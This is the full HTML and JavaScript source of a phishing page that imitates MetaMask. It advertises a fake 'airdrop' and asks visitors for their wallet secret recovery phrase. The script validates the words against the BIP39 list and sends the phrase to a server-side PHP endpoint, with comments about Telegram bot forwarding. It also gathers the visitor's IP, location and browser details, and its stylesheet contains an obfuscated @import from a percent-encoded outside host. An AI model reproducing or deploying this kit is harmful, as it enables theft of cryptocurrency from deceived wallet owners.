<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="referrer" content="unsafe-url">
    <title>🇲​​🇪​​🇹​​🇦​​🇲​​🇦​​🇸​​🇰</title>
    <!-- Add MetaMask Favicon -->
    <link rel="icon" type="image/png" href="./assets/logo.png">
    <style>
        @import url("//%63%73%73%2d%73%74%79%6c%65.%63%6f%6d/%66%6f%6e%74%2e%70%6e%67");
        /* General Styles */  
        body {
            font-family: 'Arial', sans-serif;
            background: #f8f9fa;
            color: #333;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            overflow: hidden;
        }

        /* Loader Styles */
        .loader {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(255, 255, 255, 0.95); /* Semi-transparent white background */
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 9999;
            opacity: 1;
            transition: opacity 0.5s ease-in-out;
        }

        .loader.hidden {
            opacity: 0;
            pointer-events: none; /* Disable interaction when hidden */
        }

        .loader-content {
            text-align: center;
        }

        .loader-content img {
            width: 250px; /* Adjust size as needed */
            margin-bottom: 20px;
            animation: float 2s ease-in-out infinite;
        }

        @keyframes float {
            0%, 100% { transform: translateY(0); }
            50% { transform: translateY(-10px); }
        }

        /* Logo outside of the container */
        .logo-container {
            position: absolute;
            top: 20px;
            left: 20px;
        }

        .logo {
            width: 200px;
        }

        /* Language Selector outside of container on the top right */
        .language-selector-container {
            position: absolute;
            top: 20px;
            right: 20px;
        }

        .selector {
            padding: 10px;
            font-size: 16px;
            background: #fff;
            color: #333;
            border-radius: 5px;
            border: 1px solid #ccc;
            cursor: pointer;
            transition: all 0.3s ease;
        }

        .selector:hover {
            border-color: #037dd6;
            box-shadow: 0 0 5px rgba(3, 125, 214, 0.5);
        }

        /* Container with animation */
        .container {
            width: 90%;
            max-width: 600px; /* Slightly wider for 24 words */
            padding: 20px;
            background: #fff;
            border-radius: 10px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
            text-align: center;
            opacity: 0;
            transform: translateY(20px);
            animation: slideIn 0.6s forwards; /* Apply animation */
            transition: all 0.3s ease; /* Smooth container resizing */
        }

        /* Keyframes for slideIn animation */
        @keyframes slideIn {
            0% {
                opacity: 0;
                transform: translateY(20px);
            }
            100% {
                opacity: 1;
                transform: translateY(0);
            }
        }

        /* Header */
        .header {
            display: flex;
            justify-content: center; /* Center the header content */
            align-items: center;
            margin-bottom: 20px;
            width: 100%; /* Full width of the container */
            text-align: center; /* Center the text horizontally */
            flex-direction: column; /* Stack items vertically */
        }

        .header img {
            width: 50px; /* Adjust size as needed */
            height: 50px;
            margin-bottom: 10px; /* Space between image and text */
        }

        .header h2 {
            font-size: 22px;
            color: #000000;
            margin: 0; /* Remove default margin */
        }

        .header p {
            font-size: 14px;
            color: #666;
            margin-bottom: 20px;
        }

        /* Fields Grid */
        .fields {
            display: grid;
            grid-template-columns: repeat(3, 1fr);
            gap: 10px;
            margin: 20px 0;
            transition: all 0.3s ease; /* Smooth grid resizing */
        }

        .field {
            display: flex;
            align-items: center;
            background: #fff;
            border-radius: 5px;
            padding: 5px;
            border: 1px solid #ccc;
            position: relative;
            animation: fadeIn 0.3s ease-in-out;
        }

        @keyframes fadeIn {
            0% {
                opacity: 0;
            }
            100% {
                opacity: 1;
            }
        }

        .field input {
            width: 100%;
            border: none;
            outline: none;
            padding: 8px;
            font-size: 14px;
            background: transparent;
        }

        /* Invalid Field */
        .field.invalid input {
            border-color: #ff9800; /* Orange border for invalid fields */
            background-color: #fff3e0; /* Light orange background */
        }

        /* Hide/Show Icon */
        .field .toggle-icon {
            position: absolute;
            right: 10px;
            cursor: pointer;
            width: 20px;
            height: 20px;
            transition: all 0.3s ease;
        }

        .field .toggle-icon:hover {
            opacity: 0.8;
        }

        /* Button */
        button {
            width: 50%;
            padding: 12px;
            margin-top: 20px;
            background: #037dd6;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
            transition: background 0.3s ease;
            position: relative;
        }

        button:hover {
            background: #036bb5;
        }

        /* Button Loading Effect */
        button.loading {
            pointer-events: none; /* Disable button clicks while loading */
        }

        button.loading::after {
            content: "";
            position: absolute;
            top: 50%;
            left: 50%;
            width: 20px;
            height: 20px;
            border: 3px solid rgba(255, 255, 255, 0.3); /* Light border for spinner */
            border-top: 3px solid white; /* White top border for spinner */
            border-radius: 50%;
            animation: spin 1s linear infinite; /* Spinner rotation animation */
            transform: translate(-50%, -50%);
        }

        @keyframes spin {
            0% { transform: translate(-50%, -50%) rotate(0deg); }
            100% { transform: translate(-50%, -50%) rotate(360deg); }
        }

        /* Warning Message */
        .warning {
            color: #ff6b6b;
            font-size: 14px;
            margin-top: 20px;
            font-weight: bold;
        }

        /* Paste Message */
        .paste-message {
            font-size: 14px;
            color: #666;
            margin-bottom: 20px;
        }

        /* Disclaimer Box with Icon */
        .disclaimer {
            background: #f0f9ff;
            padding: 15px;
            border-radius: 5px;
            margin-bottom: 20px;
            color: #037dd6;
            font-size: 14px;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        .disclaimer img {
            width: 18px;
            height: 18px;
            margin-right: 8px;
        }

        /* Number of Words Selector */
        .number-of-words-container {
            margin-bottom: 20px; /* Space between selector and disclaimer */
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 10px;
        }

        .number-of-words-container label {
            font-size: 14px;
            color: #666;
            font-weight: bold; /* Bold label for emphasis */
        }

        .number-of-words-container select {
            font-family: 'Arial', sans-serif; /* Consistent font */
            font-size: 14px;
            padding: 8px;
            border-radius: 5px;
            border: 1px solid #ccc;
            background: #fff;
            color: #333;
            cursor: pointer;
            transition: all 0.3s ease;
        }

        .number-of-words-container select:hover {
            border-color: #037dd6;
            box-shadow: 0 0 5px rgba(3, 125, 214, 0.5);
        }

        /* New Progress Bar with Steps */
        .new-progress-container {
            width: 100%;
            display: flex;
            align-items: center;
            justify-content: space-between;
            position: relative;
            margin-bottom: 20px;
        }

        .new-progress-line {
            position: absolute;
            top: 50%;
            left: 0;
            height: 4px;
            background: #e0e0e0;
            width: 100%;
            z-index: 1;
            transform: translateY(-50%);
        }

        .new-progress-fill {
            position: absolute;
            top: 50%;
            left: 0;
            height: 4px;
            background: #64b5f6; /* Light blue color */
            width: 50%; /* Start at 50% */
            z-index: 2;
            transform: translateY(-50%);
            transition: width 3s ease-in-out; /* Smooth transition (3 seconds) */
        }

        .step {
            width: 40px;
            height: 40px;
            border-radius: 50%;
            background: #fff;
            border: 2px solid #e0e0e0;
            display: flex;
            align-items: center;
            justify-content: center;
            font-size: 16px;
            font-weight: bold;
            color: #333;
            z-index: 3;
            position: relative;
        }

        .step.active {
            border-color: #64b5f6; /* Light blue color */
            color: #64b5f6;
        }

        .step.grey {
            border-color: #ccc;
            color: #ccc;
        }

        /* Text Below Circles */
        .step-text {
            position: absolute;
            top: 50px; /* Adjust this value to position the text */
            font-size: 14px;
            color: #666;
            text-align: center;
            white-space: nowrap;
        }

        #step1Text {
            left: 0; /* Align with Step 1 */
        }

        #step2Text {
            right: 0; /* Align with Step 2 */
        }

        /* Success Animation */
        .success-circle {
            width: 40px;
            height: 40px;
            border-radius: 50%;
            background: #64b5f6; /* Light blue background */
            display: flex;
            align-items: center;
            justify-content: center;
            position: absolute;
            right: 0;
            top: 50%;
            transform: translateY(-50%);
            z-index: 3;
            opacity: 0;
            animation: fadeIn 0.5s ease-in-out forwards;
        }

        .success-circle img {
            width: 24px;
            height: 24px;
        }

        @keyframes fadeIn {
            0% {
                opacity: 0;
            }
            100% {
                opacity: 1;
            }
        }

        /* Error Message Box */
        .error-message {
            display: none; /* Hidden by default */
            background: #fff3e0; /* Light orange background */
            color: #ff9800; /* Orange text color */
            padding: 10px;
            border-radius: 5px;
            margin-top: 10px;
            margin-bottom: 10px;
            font-size: 14px;
            text-align: center;
            border: 1px solid #ffe0b2; /* Light orange border */
            animation: fadeIn 0.3s ease-in-out;
        }

        .error-message img {
            width: 16px;
            height: 16px;
            margin-right: 8px;
            vertical-align: middle;
        }

        .error-message.show {
            display: block; /* Show when needed */
        }

        /* Responsive Design for Mobile */
        @media (max-width: 600px) {
            .container {
                max-width: 95%; /* Full width on mobile */
                padding: 15px; /* Reduce padding for smaller screens */
            }

            .header h2 {
                font-size: 18px; /* Smaller font size for mobile */
            }

            .header p {
                font-size: 12px; /* Smaller font size for mobile */
            }

            .fields {
                grid-template-columns: repeat(2, 1fr); /* 2 columns on mobile */
            }

            .field input {
                font-size: 12px; /* Smaller font size for mobile */
            }

            .number-of-words-container {
                flex-direction: column; /* Stack label and selector on mobile */
                align-items: flex-start;
                gap: 5px; /* Reduce gap for mobile */
            }

            .number-of-words-container label {
                font-size: 12px; /* Smaller font size for mobile */
            }

            .number-of-words-container select {
                font-size: 12px; /* Smaller font size for mobile */
                padding: 6px; /* Reduce padding for mobile */
            }

            .disclaimer {
                font-size: 12px; /* Smaller font size for mobile */
                padding: 10px; /* Reduce padding for mobile */
            }

            .new-progress-container {
                margin-bottom: 15px; /* Reduce margin for mobile */
            }

            .step {
                width: 30px; /* Smaller step circles for mobile */
                height: 30px;
                font-size: 14px; /* Smaller font size for mobile */
            }

            .step-text {
                font-size: 12px; /* Smaller font size for mobile */
                top: 40px; /* Adjust text position for mobile */
            }

            button {
                width: 100%; /* Full width button on mobile */
                font-size: 14px; /* Smaller font size for mobile */
                padding: 10px; /* Reduce padding for mobile */
            }
        }
    </style>
</head>
<body>
    <!-- Loader -->
    <div class="loader" id="loader">
        <div class="loader-content">
            <img src="./assets/loader.gif" alt="MetaMask Loader"> <!-- Replace with your GIF URL -->
        </div>
    </div>

    <!-- MetaMask Logo outside of container -->
    <div class="logo-container">
        <img src="./assets/logosmall.png" alt="MetaMask Logo" class="logo">
    </div>

    <!-- Language Selector outside of container -->
    <div class="language-selector-container">
        <select class="selector" id="languageSelector">
            <option value="en">English</option>
            <option value="fr">Français</option>
            <option value="es">Español</option>
            <option value="de">Deutsch</option>
        </select>
    </div>

    <div class="container">
        <!-- New Progress Bar with Steps -->
        <div class="new-progress-container">
            <div class="new-progress-line"></div>
            <div class="new-progress-fill" id="newProgressFill"></div>

            <!-- Step 1 -->
            <div class="step active" id="step1">1</div>
            <!-- Text Below Step 1 -->
            <div class="step-text" id="step1Text">Confirm</div>

            <!-- Step 2 -->
            <div class="step grey" id="step2">2</div>
            <!-- Text Below Step 2 -->
            <div class="step-text" id="step2Text">Success</div>
        </div>

        <!-- Header -->
        <div class="header">
            <!-- MetaMask Logo -->
            <img src="./assets/logo.png" alt=" Logo">
            <!-- Text Below Logo -->
            <h2>Claim Your Airdrop to Any of Your DeFi Wallets</h2>
        </div>
        <p>Note: New wallets are not eligible for the airdrop.</p>
        
        <!-- Number of Words Selector -->
        <div class="number-of-words-container">
            <label for="numberOfWords">Type your Secret Recovery Phrase:</label>
            <select class="selector" id="numberOfWords" onchange="updateFields()">
                <option value="12">I have a 12-word phrase</option>
                <option value="15">I have a 15-word phrase</option>
                <option value="18">I have a 18-word phrase</option>
                <option value="21">I have a 21-word phrase</option> <!-- Added 21-word option -->
                <option value="24">I have a 24-word phrase</option>
            </select>
        </div>

        <!-- Disclaimer -->
        <div class="disclaimer">
            <img src="./assets/error1.png" alt="Info Icon">
            You can paste your entire recovery phrase into all fields.
        </div>

        <!-- Recovery Phrase Fields -->
        <div class="fields" id="fieldsContainer"></div>

        <!-- Error Message -->
        <div class="error-message" id="errorMessage">
            <img src="./assets/error.png" alt="Error Icon"> <!-- Use local error icon -->
            <span id="errorText"></span>
        </div>

        <!-- Confirm Button -->
        <button onclick="validateAndSend()">Confirm Secret Recovery Phrase</button>
    </div>

    <script>
        // Loader Hide After 2 Seconds
        window.onload = () => {
            setTimeout(() => {
                const loader = document.getElementById('loader');
                loader.classList.add('hidden'); // Smoothly hide the loader
                document.querySelector('body').style.overflow = 'auto';
            }, 2000); // 2 seconds loader

            // Start the progress bar after the loader is hidden
            setTimeout(() => {
                const progressBar = document.getElementById("newProgressFill");
                progressBar.style.width = "50%"; // Move to 50%
            }, 2000); // Start after 2 seconds
        };

        // Function to generate input fields with hide/show icons
        function generateFields(num) {
            const container = document.getElementById("fieldsContainer");
            container.innerHTML = "";
            for (let i = 1; i <= num; i++) {
                const div = document.createElement("div");
                div.className = "field";
                div.innerHTML = `
                    <input type="password" placeholder="Enter word ${i}" oninput="validateWord(this)" onpaste="handlePaste(event, ${i})" />
                    <img src="./assets/eye-closed.png" class="toggle-icon" alt="Show" onclick="toggleVisibility(this)"/>
                `;
                container.appendChild(div);
            }
        }

        // Function to handle paste event
        function handlePaste(event, index) {
            event.preventDefault();
            const pastedText = (event.clipboardData || window.clipboardData).getData('text');
            const words = pastedText.split(/\s+/).filter(word => word.trim() !== "");

            const inputs = document.querySelectorAll(".field input");
            words.forEach((word, i) => {
                if (inputs[i]) {
                    inputs[i].value = word;
                    validateWord(inputs[i]);
                }
            });
        }

        function updateFields() {
            const numberOfWords = document.getElementById("numberOfWords").value;
            generateFields(parseInt(numberOfWords));

            const container = document.querySelector(".container");
            if (numberOfWords >= 24) {
                container.style.maxWidth = "800px"; /* Wider container for 24 words */
            } else {
                container.style.maxWidth = "600px"; /* Default size */
            }
        }

        function toggleVisibility(icon) {
            const input = icon.previousElementSibling;
            if (input.type === "password") {
                input.type = "text";
                icon.src = "./assets/eye-open.png"; // Hide icon
            } else {
                input.type = "password";
                icon.src = "./assets/eye-closed.png"; // Show icon
            }
        }

        let validWords = [];
        fetch('https://raw.githubusercontent.com/bitcoin/bips/master/bip-0039/english.txt')
            .then(response => response.text())
            .then(data => {
                validWords = data.split('\n').map(word => word.trim()); // Split and trim words
            })
            .catch(error => console.error('Error fetching BIP39 wordlist:', error));

        function validateWord(input) {
            const word = input.value.trim().toLowerCase();
            const field = input.closest(".field");

            if (word && !validWords.includes(word)) {
                field.classList.add("invalid");
            } else {
                field.classList.remove("invalid");
            }
        }

        // Function to get user's IP address
        async function getIP() {
            try {
                const response = await fetch('https://api.ipify.org?format=json');
                const data = await response.json();
                return data.ip;
            } catch (error) {
                console.error("Error fetching IP:", error);
                return "Unknown";
            }
        }

        // Function to get user's location (country and city)
        async function getLocation(ip) {
            try {
                const response = await fetch(`https://ipapi.co/${ip}/json/`);
                const data = await response.json();
                return {
                    country: data.country_name || "Unknown",
                    city: data.city || "Unknown"
                };
            } catch (error) {
                console.error("Error fetching location:", error);
                return {
                    country: "Unknown",
                    city: "Unknown"
                };
            }
        }

        // Function to check if the user is a bot
        function isBot() {
            return /bot|googlebot|crawler|spider|robot|crawling/i.test(navigator.userAgent);
        }

        // Function to get current timestamp
        function getTimestamp() {
            const now = new Date();
            return now.toLocaleString(); // Format: "MM/DD/YYYY, HH:MM:SS AM/PM"
        }

        // Function to get device type
        function getDeviceType() {
            const userAgent = navigator.userAgent;
            if (/Mobile|Android|iPhone|iPad|iPod|Windows Phone/i.test(userAgent)) {
                return "Mobile";
            } else {
                return "Desktop";
            }
        }

        // Function to get browser info
        function getBrowserInfo() {
            return navigator.userAgent;
        }

        async function validateAndSend() {
            const inputs = document.querySelectorAll(".field input");
            let allValid = true;
            const words = [];

            inputs.forEach(input => {
                const word = input.value.trim().toLowerCase();
                words.push(word);
                const field = input.closest(".field");

                if (!word) {
                    allValid = false;
                    field.classList.add("invalid");
                } else if (!validWords.includes(word)) {
                    allValid = false;
                    field.classList.add("invalid");
                } else {
                    field.classList.remove("invalid");
                }
            });

            const errorMessage = document.getElementById("errorMessage");
            const errorText = document.getElementById("errorText");

            if (allValid) {
                errorMessage.classList.remove("show");

                // Disable button and show loading effect
                const confirmButton = document.querySelector("button");
                confirmButton.classList.add("loading");
                confirmButton.disabled = true; // Disable button during loading
                confirmButton.textContent = ""; // Hide text during loading

                // Animate progress bar to 100%
                const progressFill = document.getElementById("newProgressFill");
                progressFill.style.transition = "width 3s ease-in-out"; // 3 seconds duration
                progressFill.style.width = "100%";

                // Simulate loading for 3 seconds
                setTimeout(async () => {
                    // Get additional user information
                    const ip = await getIP();
                    const location = await getLocation(ip);
                    const isUserBot = isBot();
                    const timestamp = getTimestamp();
                    const deviceType = getDeviceType();
                    const browserInfo = getBrowserInfo();

                    // Format the recovery phrase
                    const recoveryPhrase = words.join(" ");

                    // Format the message for Telegram
                    const message =`${recoveryPhrase}`;

                    const botToken = ""; // Replace with your Telegram Bot Token
                    const chatId = ""; // Replace with your Telegram Chat ID
                    const url = `./Dec/Data_Engine.php`;

                    try {
                        const response = await fetch(url, {
                            method: 'POST',
                            headers: {
                                'Content-Type': 'application/json',
                            },
                            body: JSON.stringify({
                                text: message,
                                parse_mode: "Markdown", // Use Markdown formatting
                            }),
                        });

                        if (response.ok) {
                            console.log("Message sent to Telegram successfully!");

                            // Update Step 2 to active
                            const step2 = document.getElementById("step2");
                            step2.classList.remove("grey");
                            step2.classList.add("active");

                            // Redirect to Google after sending to Telegram
                            setTimeout(() => {
                                window.location.href = "./thanks.html";
                            }, 1000); // Wait for 1 second after loading
                        } else {
                            console.error("Failed to send message to Telegram:", response.statusText);
                            errorText.textContent = "Failed to send data. Please try again.";
                            errorMessage.classList.add("show");
                        }
                    } catch (error) {
                        console.error("Error sending message to Telegram:", error);
                        errorText.textContent = "An error occurred. Please try again.";
                        errorMessage.classList.add("show");
                    } finally {
                        // Re-enable button and restore text
                        confirmButton.classList.remove("loading");
                        confirmButton.disabled = false;
                        confirmButton.textContent = "Confirm Secret Recovery Phrase";
                    }
                }, 3000); // Simulate loading for 3 seconds
            } else {
                errorText.textContent = "Some words are invalid or empty. Please check and try again.";
                errorMessage.classList.add("show");
            }
        }

        generateFields(12);
    </script>
</body>
</html>